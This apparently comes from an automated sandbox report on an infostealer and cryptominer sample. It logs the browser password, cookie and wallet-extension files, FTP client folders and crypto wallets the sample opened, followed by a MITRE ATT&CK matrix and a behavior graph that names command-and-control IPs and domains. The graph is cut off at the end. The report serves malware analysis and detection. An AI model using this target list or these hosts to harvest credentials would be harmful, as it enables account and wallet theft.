                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: Yara matchFile source: Process Memory Space: Ryu8yUx.exe PID: 3616, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 13.2.Ryu8yUx.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.Ryu8yUx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2258699182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 12.0.Ryu8yUx.exe.ff0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting
                              Valid Accounts431
                              Windows Management Instrumentation
                              1
                              Scripting
                              1
                              DLL Side-Loading
                              1
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              11
                              File and Directory Discovery
                              Remote Services11
                              Archive Collected Data
                              13
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter
                              1
                              DLL Side-Loading
                              1
                              Windows Service
                              11
                              Deobfuscate/Decode Files or Information
                              LSASS Memory445
                              System Information Discovery
                              Remote Desktop Protocol41
                              Data from Local System
                              21
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              1
                              Windows Service
                              512
                              Process Injection
                              41
                              Obfuscated Files or Information
                              Security Account Manager1
                              Query Registry
                              SMB/Windows Admin Shares1
                              Screen Capture
                              1
                              Non-Standard Port
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              PowerShell
                              1
                              Scheduled Task/Job
                              1
                              Scheduled Task/Job
                              22
                              Software Packing
                              NTDS1381
                              Security Software Discovery
                              Distributed Component Object Model2
                              Clipboard Data
                              4
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Timestomp
                              LSA Secrets2
                              Process Discovery
                              SSHKeylogging125
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials781
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Masquerading
                              DCSync1
                              Application Window Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Modify Registry
                              Proc Filesystem2
                              System Owner/User Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt781
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadow1
                              Remote System Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                              Process Injection
                              Network Sniffing1
                              System Network Configuration Discovery
                              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611334 Sample: Mc3FDUMnVz.exe Startdate: 10/02/2025 Architecture: WINDOWS Score: 100 110 modernakdventure.cyou 2->110 112 xmr.2miners.com 2->112 114 3 other IPs or domains 2->114 150 Sigma detected: Xmrig 2->150 152 Suricata IDS alerts for network traffic 2->152 154 Found malware configuration 2->154 156 23 other signatures 2->156 15 skotes.exe 22 2->15         started        20 skotes.exe 2->20         started        22 Mc3FDUMnVz.exe 5 2->22         started        24 regsvr32.exe 2->24         started        signatures3 process4 dnsIp5 126 185.215.113.43, 51665, 51666, 51669 WHOLESALECONNECTIONSNL Portugal 15->126 128 185.215.113.97, 51667, 51670, 51678 WHOLESALECONNECTIONSNL Portugal 15->128 76 C:\Users\user\AppData\Local\...\Ryu8yUx.exe, PE32 15->76 dropped 78 C:\Users\user\AppData\Local\...\kUHbhqh.exe, PE32+ 15->78 dropped 80 C:\Users\user\AppData\Local\...\Fe36XBk.exe, PE32 15->80 dropped 86 3 other malicious files 15->86 dropped 130 Hides threads from debuggers 15->130 132 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->132 134 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->134 26 kUHbhqh.exe 3 5 15->26         started        31 Ryu8yUx.exe 15->31         started        33 Fe36XBk.exe 15->33         started        136 Antivirus detection for dropped file 20->136 138 Multi AV Scanner detection for dropped file 20->138 140 Detected unpacking (changes PE section rights) 20->140 148 3 other signatures 20->148 82 C:\Users\user\AppData\Local\...\skotes.exe, PE32 22->82 dropped 84 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 22->84 dropped 142 Tries to evade debugger and weak emulator (self modifying code) 22->142 144 Tries to detect virtualization through RDTSC time measurements 22->144 35 skotes.exe 22->35         started        146 Suspicious powershell command line found 24->146 37 powershell.exe 24->37         started        file6 signatures7 process8 dnsIp9 122 93.88.203.169, 51679, 51710, 51711 DRAVANET-ASHU Hungary 26->122 104 C:\Users\user\AppData\...\Stamp_Setup.exe, PE32 26->104 dropped 106 C:\Users\user\AppData\...\JeDkUsy6Fzs0.bat, DOS 26->106 dropped 178 Multi AV Scanner detection for dropped file 26->178 180 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 26->180 182 Found many strings related to Crypto-Wallets (likely being stolen) 26->182 200 4 other signatures 26->200 39 